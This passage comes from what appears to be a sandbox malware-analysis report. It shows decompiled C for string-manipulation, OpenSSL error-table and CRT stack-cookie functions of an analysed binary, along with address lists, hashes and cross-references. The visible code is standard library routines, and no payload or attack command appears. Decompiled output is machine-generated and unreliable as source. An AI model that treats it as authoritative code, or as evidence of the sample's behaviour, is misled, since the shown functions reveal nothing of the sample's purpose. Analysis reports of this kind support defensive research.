											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

0x00414920
0x00414923
0x00414927
0x0041492a
0x0041492d
0x00414932
0x00414c3d
0x00414c3d
0x00414c42
0x00414c47
0x00414c48
0x00414c49
0x00414c4a
0x00414c4b
0x00414c4c
0x00414c4d
0x00414c4e
0x00414c4f
0x00414c53
0x00414938
0x00414938
0x0041493f
0x00414944
0x00000000
0x0041494a
0x0041494e
0x00414951
0x00414957
0x0041495d
0x00414966
0x0041496b
0x00414972
0x00414977
0x0041497c
0x0041497f
0x00414982
0x00414c33
0x00414c38
0x00000000
0x00414988
0x0041498b
0x0041498e
0x00414990
0x00414996
0x00414999
0x0041499c
0x004149a5
0x004149aa
0x004149ad
0x004149b0
0x004149b0
0x004149b5
0x00414a36
0x00414a39
0x00414a3b
0x00414a94
0x00414a96
0x00414af9
0x00414afc
0x00414aff
0x00414b01
0x00414b6c
0x00414b6f
0x00414b72
0x00414b7e
0x00414b74
0x00414b76
0x00414b79
0x00414b79
0x00414b81
0x00414b84
0x00414b8a
0x00414b86
0x00414b86
0x00414b86
0x00414b96
0x00414b9b
0x00414ba1
0x00414ba4
0x00414baa
0x00414ba6
0x00414ba6
0x00414ba6
0x00414bac
0x00414baf
0x00414bb5
0x00414bb1
0x00414bb1
0x00414bb1
0x00414bbf
0x00414bca
0x00414bcf
0x00414bd5
0x00414bd8
0x00414bde
0x00414bda
0x00414bda
0x00414bda
0x00414be0
0x00414be3
0x00414be9
0x00414be5
0x00414be5
0x00414be5
0x00414bf0
0x00414bf4
0x00414bf6
0x00414bf6
0x00414b03
0x00414b03
0x00414b06
0x00414b09
0x00414b0f
0x00414b0b
0x00414b0b
0x00414b0b
0x00414b11
0x00414b14
0x00414b1a
0x00414b16
0x00414b16
0x00414b16
0x00414b2b
0x00414b30
0x00414b36
0x00414b39
0x00414b3f
0x00414b3b
0x00414b3b
0x00414b3b
0x00414b41
0x00414b44
0x00414b61
0x00414b62
0x00414b64
0x00414b46
0x00414b4e
0x00414b4f
0x00414b51
0x00414b51
0x00414b44
0x00414a98
0x00414a98
0x00414a9b
0x00414a9e
0x00414aa4
0x00414aa0
0x00414aa0
0x00414aa0
0x00414aa6
0x00414aa9
0x00414aaf
0x00414aab
0x00414aab
0x00414aab
0x00414ac2
0x00414ac7
0x00414acd
0x00414ad0
0x00414ad6
0x00414ad2
0x00414ad2
0x00414ad2
0x00414ad8
0x00414adb
0x00414aeb
0x00414af0
0x00414af1
0x00414add
0x00414adf
0x00414ae2
0x00414ae3
0x00414ae3
0x00414adb
0x00414bf9
0x00414a3d
0x00414a3d
0x00414a40
0x00414a43
0x00414a49
0x00414a45
0x00414a45
0x00414a45
0x00414a4b
0x00414a4e
0x00414a54
0x00414a50
0x00414a50
0x00414a50
0x00414a5d
0x00414a62
0x00414a68
0x00414a6b
0x00414a71
0x00414a6d
0x00414a6d
0x00414a6d
0x00414a73
0x00414a76
0x00414a7c
0x00414a78
0x00414a78
0x00414a78
0x00414a81
0x00414a86
0x00414a8c
0x00414a8c
0x00414bfc
0x004149b7
0x004149b7
0x004149bd
0x004149c6
0x004149bf
0x004149c1
0x004149c1
0x004149cc
0x004149d2
0x004149ce
0x004149ce
0x004149ce
0x004149d4
0x004149d9
0x004149f1
0x004149f6
0x004149f9
0x004149f9
0x00414a00
0x00414a02
0x00414a02
0x00414a08
0x00414a0e
0x00414a0a
0x00414a0a
0x00414a0a
0x00414a10
0x00414a15
0x00414a29
0x00414a2e
0x00414a15
0x00414c08
0x00414c0b
0x00414c0f
0x00414c23
0x00414c25
0x00414c29
0x00414c30
0x00414c11
0x00414c16
0x00414c20
0x00414c20
0x00414c0f
0x00414982
0x00414944

APIs

_memmove.LIBCMT ref: 004149F1

Strings

invalid string position, xrefs: 00414C3D
string too long, xrefs: 00414C33

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

0x00417d50
0x00417d58
0x00417d5b
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d71
0x00000000
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d86
0x00000000
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417dae
0x00417dae
0x00417d86
0x00417d71

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

invalid string position, xrefs: 00417EDF
string too long, xrefs: 00417EE9

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

0x004516ae
0x004516b3
0x004516bd
0x004516e4
0x004516f7
0x004516fc
0x004516ff
0x00451706
0x0045171f
0x00451721
0x00451722
0x00451727
0x0045172c
0x00451731
0x00451731
0x00451734
0x00451737
0x00451739
0x0045173a
0x0045173f
0x00451742
0x00451744
0x0045174a
0x0045174f
0x00451752
0x00451756
0x00451756
0x00451758
0x0045175b
0x0045175d
0x0045175d
0x0045175b
0x00451763
0x00451766
0x00451767
0x0045176a
0x0045176a
0x00451780
0x00451795
0x00451708
0x0045171e
0x0045171e
0x004516bf
0x004516d5
0x004516d5

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t41;
				char* _t46;
				char* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t59 = __ebx;
				_t41 =  *0x50ad20; // 0x4ea20c1c
				_t42 = _t41 ^ _t69;
				_v8 = _t41 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t42);
					_pop(_t60);
				}
				_v804 = _v804 & 0x00000000;
				E0042B420( &_v800, 0, 0x4c);
				_v812 =  &_v804;
				_t46 =  &_v724;
				_v808 = _t46;
				_v548 = _t46;
				_v552 = _t60;
				_v556 = _t65;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t23);
				_v540 = _v0;
				_t48 =  &_v0;
				_v528 = _t48;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t48 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t55);
				}
				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00424168
0x00424168
0x00424168
0x00424171
0x00424176
0x00424178
0x00424180
0x00424182
0x00424185
0x0042418a
0x0042418a
0x0042418b
0x0042419d
0x004241ab
0x004241b1
0x004241b7
0x004241bd
0x004241c3
0x004241c9
0x004241cf
0x004241d5
0x004241db
0x004241e1
0x004241e8
0x004241ef
0x004241f6
0x004241fd
0x00424204
0x0042420b
0x0042420c
0x00424215
0x0042421b
0x0042421e
0x00424224
0x00424231
0x0042423a
0x00424243
0x0042424c
0x00424258
0x00424269
0x00424275
0x00424278
0x0042427d
0x0042428c

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x50ad20; // 0x4ea20c1c
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0x4ea20c1c
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0xb15df3e3
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a784
0x0042a786
0x0042a786
0x0042ab89
0x0042ab93
0x0042ab9a
0x0042ab9e
0x0042ab9f
0x0042ab9f
0x0042aba1
0x0042aba6
0x0042abac
0x0042abb2
0x0042abb8
0x0042abbe
0x0042abc4
0x0042abcb
0x0042abd2
0x0042abd9
0x0042abe0
0x0042abe7
